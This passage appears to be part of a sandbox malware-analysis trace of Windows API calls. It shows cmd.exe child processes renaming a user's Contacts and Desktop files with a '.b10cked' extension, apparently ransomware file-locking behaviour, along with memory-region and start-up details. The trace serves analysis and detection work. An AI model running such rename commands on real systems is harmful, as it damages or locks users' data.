lpFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact.b10cked", nBufferLength=0x104, lpBuffer=0x12f3b8, lpFilePart=0x12ef48 | 
out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact.b10cked", lpFilePart=0x12ef48*="uosjfl sidvllie.contact.b10cked") returned 0x39 [0220.077] SetErrorMode (uMode=0x0) returned 0x1 [0220.077] SetLastError (dwErrCode=0x0) [0220.077] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact.b10cked" (normalized: "c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact.b10cked")) returned 0xffffffff [0220.077] GetLastError () returned 0x2 [0220.077] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON", fInfoLevelId=0x1, lpFindFileData=0x12e8c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e8c4) returned 0x310e70 [0220.077] FindNextFileW (in: hFindFile=0x310e70, lpFindFileData=0x12e8c4 | out: lpFindFileData=0x12e8c4) returned 0 [0220.078] GetLastError () returned 0x12 [0220.078] FindClose (in: hFindFile=0x310e70 | out: hFindFile=0x310e70) returned 1 [0220.078] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON", fInfoLevelId=0x1, lpFindFileData=0x321be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321be0) returned 0x310e70 [0220.079] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact.b10cked", nBufferLength=0x104, lpBuffer=0x12eb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact.b10cked", lpFilePart=0x0) returned 0x39 [0220.079] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact", nBufferLength=0x104, lpBuffer=0x12eb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact", lpFilePart=0x0) returned 0x31 [0220.079] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact" (normalized: "c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact")) returned 0x20 [0220.079] MoveFileExW 
(lpExistingFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact" (normalized: "c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact"), lpNewFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact.b10cked" (normalized: "c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact.b10cked"), dwFlags=0x3) returned 1 [0220.079] FindClose (in: hFindFile=0x310e70 | out: hFindFile=0x310e70) returned 1 [0220.079] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x12eb10 | out: _Buffer=" 1") returned 9 [0220.079] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.079] GetFileType (hFile=0x7) returned 0x2 [0220.086] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.086] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12ea9c | out: lpMode=0x12ea9c) returned 1 [0220.086] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.086] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x12ead0 | out: lpConsoleScreenBufferInfo=0x12ead0) returned 1 [0220.086] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0220.087] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x12eb10 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0220.087] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x12eaf4, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x12eaf4*=0x1a) returned 1 [0220.087] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.087] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.087] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.087] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.087] _get_osfhandle (_FileHandle=0) returned 0x3 
[0220.087] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.087] SetConsoleInputExeNameW () returned 0x1 [0220.087] GetConsoleOutputCP () returned 0x1b5 [0220.087] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.088] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.088] exit (_Code=0) Process: id = "570" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166c0" os_pid = "0xc78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32816 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32817 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 32818 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 32819 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 32820 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = 
"cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32821 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32822 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32823 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32824 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32825 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33032 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33033 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33034 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33035 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 33036 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 33037 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = 
"\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33038 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33039 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33040 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33041 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33042 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33043 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33044 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33045 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33060 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" 
Region: id = 33061 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33062 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33063 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 33064 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 33065 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 33066 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 33067 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 33068 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 33069 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Thread: id = 774 os_tid = 0xd30 [0220.163] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fadc | out: lpSystemTimeAsFileTime=0x12fadc*(dwLowDateTime=0xb8076ca0, dwHighDateTime=0x1d440a9)) [0220.163] GetCurrentProcessId () returned 0xc78 [0220.163] GetCurrentThreadId () returned 0xd30 [0220.163] GetTickCount () returned 0x3d74b [0220.163] QueryPerformanceCounter (in: lpPerformanceCount=0x12fad4 | out: lpPerformanceCount=0x12fad4*=27695271882) returned 1 
[0220.164] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.164] __set_app_type (_Type=0x1) [0220.164] __p__fmode () returned 0x76b331f4 [0220.164] __p__commode () returned 0x76b331fc [0220.164] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.165] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0220.165] GetCurrentThreadId () returned 0xd30 [0220.165] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd30) returned 0x38 [0220.165] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.165] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.165] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.174] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.174] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fa6c | out: phkResult=0x12fa6c*=0x0) returned 0x2 [0220.174] VirtualQuery (in: lpAddress=0x12faa3, lpBuffer=0x12fa3c, dwLength=0x1c | out: lpBuffer=0x12fa3c*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.174] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fa3c, dwLength=0x1c | out: lpBuffer=0x12fa3c*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.174] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fa3c, dwLength=0x1c | out: lpBuffer=0x12fa3c*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.174] VirtualQuery (in: 
lpAddress=0x33000, lpBuffer=0x12fa3c, dwLength=0x1c | out: lpBuffer=0x12fa3c*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.174] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fa3c, dwLength=0x1c | out: lpBuffer=0x12fa3c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0220.174] GetConsoleOutputCP () returned 0x1b5 [0220.175] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.175] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.175] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.175] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.176] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.176] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.176] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.176] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.177] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.177] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.178] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.178] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.183] GetEnvironmentStringsW () returned 0x2b0168* [0220.183] FreeEnvironmentStringsW (penv=0x2b0168) returned 1 [0220.184] GetEnvironmentStringsW () returned 0x2b0168* [0220.184] FreeEnvironmentStringsW (penv=0x2b0168) returned 1 [0220.184] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e9dc | out: phkResult=0x12e9dc*=0x40) returned 0x0 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: 
lpType=0x12e9e4*=0x0, lpData=0x12e9e8*=0x90, lpcbData=0x12e9e0*=0x1000) returned 0x2 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x1, lpcbData=0x12e9e0*=0x4) returned 0x0 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x0, lpData=0x12e9e8*=0x1, lpcbData=0x12e9e0*=0x1000) returned 0x2 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x0, lpcbData=0x12e9e0*=0x4) returned 0x0 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x40, lpcbData=0x12e9e0*=0x4) returned 0x0 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x40, lpcbData=0x12e9e0*=0x4) returned 0x0 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x0, lpData=0x12e9e8*=0x40, lpcbData=0x12e9e0*=0x1000) returned 0x2 [0220.184] RegCloseKey (hKey=0x40) returned 0x0 [0220.184] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e9dc | out: phkResult=0x12e9dc*=0x40) returned 0x0 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x0, lpData=0x12e9e8*=0x40, lpcbData=0x12e9e0*=0x1000) 
returned 0x2 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x1, lpcbData=0x12e9e0*=0x4) returned 0x0 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x0, lpData=0x12e9e8*=0x1, lpcbData=0x12e9e0*=0x1000) returned 0x2 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x0, lpcbData=0x12e9e0*=0x4) returned 0x0 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x9, lpcbData=0x12e9e0*=0x4) returned 0x0 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x9, lpcbData=0x12e9e0*=0x4) returned 0x0 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x0, lpData=0x12e9e8*=0x9, lpcbData=0x12e9e0*=0x1000) returned 0x2 [0220.185] RegCloseKey (hKey=0x40) returned 0x0 [0220.185] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b6 [0220.185] srand (_Seed=0x5b8863b6) [0220.185] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png.b10cked\"" [0220.185] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png.b10cked\"" [0220.185] 
GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.185] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b18c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.185] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.185] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.185] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.186] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.186] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.186] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.186] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.186] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.186] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.186] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.186] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.186] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.186] GetEnvironmentStringsW () returned 0x2b22b8* [0220.186] FreeEnvironmentStringsW (penv=0x2b22b8) returned 1 [0220.186] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.186] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.186] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.186] 
_wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.186] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.186] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.186] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.187] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.187] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0220.187] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.187] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f7a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.187] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f7a8, lpFilePart=0x12f7a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f7a4*="Desktop") returned 0x18 [0220.187] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.187] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f524 | out: lpFindFileData=0x12f524) returned 0x2afff8 [0220.187] FindClose (in: hFindFile=0x2afff8 | out: hFindFile=0x2afff8) returned 1 [0220.187] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f524 | out: lpFindFileData=0x12f524) returned 0x2afff8 [0220.187] FindClose (in: hFindFile=0x2afff8 | out: hFindFile=0x2afff8) returned 1 [0220.188] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f524 | out: lpFindFileData=0x12f524) returned 0x2afff8 [0220.188] FindClose (in: hFindFile=0x2afff8 | out: hFindFile=0x2afff8) returned 1 [0220.188] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.188] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.188] SetEnvironmentVariableW (lpName="=C:", 
lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.188] GetEnvironmentStringsW () returned 0x2b2ad8* [0220.188] FreeEnvironmentStringsW (penv=0x2b2ad8) returned 1 [0220.188] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.189] GetConsoleOutputCP () returned 0x1b5 [0220.197] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.197] GetUserDefaultLCID () returned 0x409 [0220.197] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.197] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f8e8, cchData=128 | out: lpLCData="0") returned 2 [0220.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f8e8, cchData=128 | out: lpLCData="0") returned 2 [0220.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f8e8, cchData=128 | out: lpLCData="1") returned 2 [0220.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0220.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0220.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, 